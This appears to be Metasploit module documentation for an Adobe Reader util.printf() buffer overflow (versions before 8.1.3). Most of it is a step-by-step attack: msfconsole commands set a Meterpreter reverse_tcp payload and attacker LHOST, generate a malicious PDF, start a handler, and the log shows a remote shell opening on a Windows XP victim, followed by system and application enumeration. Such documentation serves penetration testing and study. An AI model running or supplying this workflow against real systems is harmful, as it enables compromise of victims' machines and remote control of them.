## Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially
crafted pdf that a contains malformed `util.printf()` entry, an attacker may be able to execute arbitrary code.

Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)

## Verification Steps

  1. Install application on the target machine
  2. Start msfconsole
  3. Do: ```use exploit/windows/fileformat/adobe_utilprintf```
  4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
  5. Do: ```set LHOST [IP]```
  6. Do: ```exploit```
  7. Do: ```use exploit/multi/handler```
  8. Do: ```set LHOST [IP]```
  9. Do: ```exploit```
  10. Do: Open PDF on target machine with vulnerable software

## Scenarios

### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

  ```
  msf > use exploit/windows/fileformat/adobe_utilprintf
  msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
  msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
  msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
    FILENAME => utilprintf.pdf
  msf exploit(windows/fileformat/adobe_utilprintf) > exploit

    [*] Creating 'utilprintf.pdf' file...
    [+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
  msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
  msf exploit(multi/handler) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
  msf exploit(multi/handler) > exploit
  msf exploit(multi/handler) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
  msf exploit(multi/handler) > exploit

    [*] Started reverse TCP handler on 192.168.1.3:4444
    [*] Sending stage (180291 bytes) to 192.168.1.5
    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700

  meterpreter > sysinfo
    Computer        : COMPUTER_1
    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
    Architecture    : x86
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/windows
    meterpreter > getuid
    Server username: COMPUTER_1\USER
  meterpreter > run post/windows/gather/enum_applications

    [*] Enumerating applications installed on COMPUTER_1

    Installed Applications
    ======================

    Name            Version
    ----            -------
    Adobe Reader 8  8.0.0


    [+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
    ```